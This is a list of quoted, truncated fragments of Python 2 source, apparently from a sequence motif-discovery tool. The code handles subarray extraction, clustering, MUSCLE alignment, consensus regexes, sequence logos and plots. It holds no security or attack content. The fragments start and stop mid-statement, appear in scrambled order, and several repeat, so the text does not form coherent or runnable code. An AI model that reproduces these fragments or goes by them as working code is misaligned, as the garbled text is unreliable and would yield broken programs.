"occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname,",
"preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable,",
"self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def",
"location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i =",
"= motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num co-occurences %d",
"= np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row",
"alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return",
"logging import multiprocessing as mp import os from collections import defaultdict from eden",
"Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n",
"linkage import regex as re from collections import Counter from sklearn import metrics",
"= self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs':",
"cluster with enough space that # kmers dont interfere cluster_seqs = [] for",
"cluster = [] for h, align_seq in trimmed_align_seqs: str_list = [c for c",
"scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b",
"len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j",
"mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator,",
"import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from Bio import",
"scores = [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores:",
"%s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary,",
"raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences))",
"+= [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y,",
"to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename =",
"id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def",
"return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format ==",
"c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return",
"d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\"",
"pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y +=",
"elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data,",
"in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0]",
"seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size,",
"'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data",
"regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\"",
"!= j: # find closest instance j from any instance in i d_ij",
"= len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working",
"to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO:",
"+ '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected. Increase",
"MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs",
"pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix",
"= handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters': 7} if",
"0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return",
"0: seqs = [s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq)",
"time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for",
"mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size):",
"if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a,",
"vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score",
"= motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f' % (av,",
"n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs",
"%s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score =",
"1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size",
"' - average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False,",
"for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances =",
"SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO",
"c_i in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i - c_j):",
"txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type ==",
"complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size",
"n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size =",
"linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:, 0:2]: if id1",
"in motives: for j in motives: if j > i: seq_i = motives[i]['consensus_seq']",
"data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is True: params['diags']",
"txt.append('_' * 100) else: logger.warning( 'No motives to report. Try more permissive parameters.')",
"subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time()",
"line_str = str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq +=",
"alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if",
"logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time = time.time() # align",
"Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else:",
"txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id,",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i,",
"re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack):",
"c.most_common() code = '' for i, row in enumerate(cluster.T): c = Counter(row) k",
"yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on",
"plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp =",
"empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4",
"yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200):",
"is None or freq >= freq_th: if std_th is None or std <=",
"= '' for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common()",
"np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\"",
">= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th)",
"haystack)) size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th):",
"% (co) txt.append(info) info = ' - freq of occurrences of regex: %.2f'",
"nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches",
"cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs =",
"= [] info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info",
"sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png'",
"MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16,",
"= units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1]",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred,",
"np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row in",
"None elif len(code) == 1: code_str = code[0] else: code_str = '(' +",
"= y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution =",
"%s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in",
"from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList",
"align_seqs, 'seqs': seqs} return True, motif else: return False, None def compute_motives(self, clusters,",
"regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning(",
"%.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d",
"self.b) p_val = 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\"",
"True if success is False: break # TODO: run the predictor to learn",
"import multiprocessing as mp import os from collections import defaultdict from eden import",
"vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base",
"centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j",
"motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in motives:",
"color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname)",
"-1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i",
"is None: ids = [cluster_id for cluster_id in motives] logos = dict() for",
"collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random",
"def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if",
"seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq",
"def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids =",
"wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units",
"try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p,",
"\"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40,",
"+= '<loc>' + str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq))",
"score >= min_score and len(align_seqs) > min_cluster_size: return True else: return False def",
"- start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f",
"= defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin)",
"pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in",
"subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header",
"= match.start() e = match.end() m = s + (e - s) /",
"first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True,",
"n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs == -1:",
"= fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence",
"exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size,",
"np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix)",
"len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200,",
"success is False: break # TODO: run the predictor to learn the new",
"neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1,",
"handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags",
"= motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d' % (co)",
"m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j",
"[1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y =",
"[cluster_id for cluster_id in motives] logos = dict() for cluster_id in ids: logo_image,",
"\"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return p_val",
"code = '' for i, row in enumerate(cluster.T): c = Counter(row) k =",
"in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = ''",
"begin, end, subseq = components p = self.compute_p_value(score) if p <= p_value: yield",
"fname txt = [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://'",
"= linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:, 0:2]: if",
"plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0)",
"- c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j in centers[j]:",
"headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1]",
"random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1 def ecdf(self,",
"centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i - c_j distances[(i,",
"= -1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for",
"return 1 / (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit",
"\"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs = None for",
"l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches",
"sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start",
"= compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray",
"neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time()",
"start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix)",
"k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code += l",
"self.b) p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution",
"(end - begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for",
"= Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT')",
"in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data",
"motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' %",
"motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in ms: if",
"if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\",
"= np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5,",
"if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True,",
"chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for i",
"self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format)",
"figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def",
"= sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for",
"in centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i - c_j",
"- loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i,",
"% (len(sig), median_len)) if sigs is None: if len(sig) >= median_len: sigs =",
"align_seq in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if i",
"np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5,",
"j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True:",
"id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary):",
"sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i",
"plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s",
"self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for",
"return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in",
"av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f",
"= motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)'",
"i, row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /=",
"%d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in",
"%d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq']",
"(fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average",
"None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters:",
"Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size =",
"%s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray(",
"for match in re.finditer(needle, s): s = match.start() e = match.end() m =",
"= p.get() scores_items += scores d_time = time.time() - start_time d_loc_time = time.time()",
"\"\" for line in lines: if line: if line[0] == '>': if seq:",
"was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count()",
"= random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs =",
"orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None):",
"\"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs == -1: pool",
"chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time()",
"compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs)",
"scipy.cluster.hierarchy import linkage import regex as re from collections import Counter from sklearn",
"%s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for",
"output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname)",
"plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives:",
"end:%s width:%s' % (val, start, end, width)) for h, s in seqs: if",
"options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis =",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None):",
"not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments'",
"+= str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to",
"preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime",
"else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for",
"std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) ==",
"headers headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna':",
"logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y =",
"if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results =",
"class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name,",
"in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed",
"str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster",
"def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s,",
"c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs)",
"join all sequences in a cluster with enough space that # kmers dont",
"cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq']",
"p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs)",
"regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num co-occurences",
"begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids",
"fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/' + fname",
"= distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green',",
"% (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location(",
"cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True,",
"%d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\"",
"self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit",
"plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else:",
"estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in",
"subseq)) if not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on:",
"return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time =",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items =",
"= time.time() scores_items = [] for i, p in enumerate(results): loc_start_time = time.time()",
"try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs)",
"a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state",
"plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h,",
"is False: break # TODO: run the predictor to learn the new class",
"+= subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\"",
"figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname,",
"import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return",
"def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for",
"nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname",
"smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' %",
"for cluster_id in motives] logos = dict() for cluster_id in ids: logo_image, logo_txt",
"/ (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized",
"self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers,",
"self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator =",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0] return seq",
"seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime =",
"counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs =",
"'%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def",
"dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T):",
"l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s",
"for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as",
"def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown",
"y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0]",
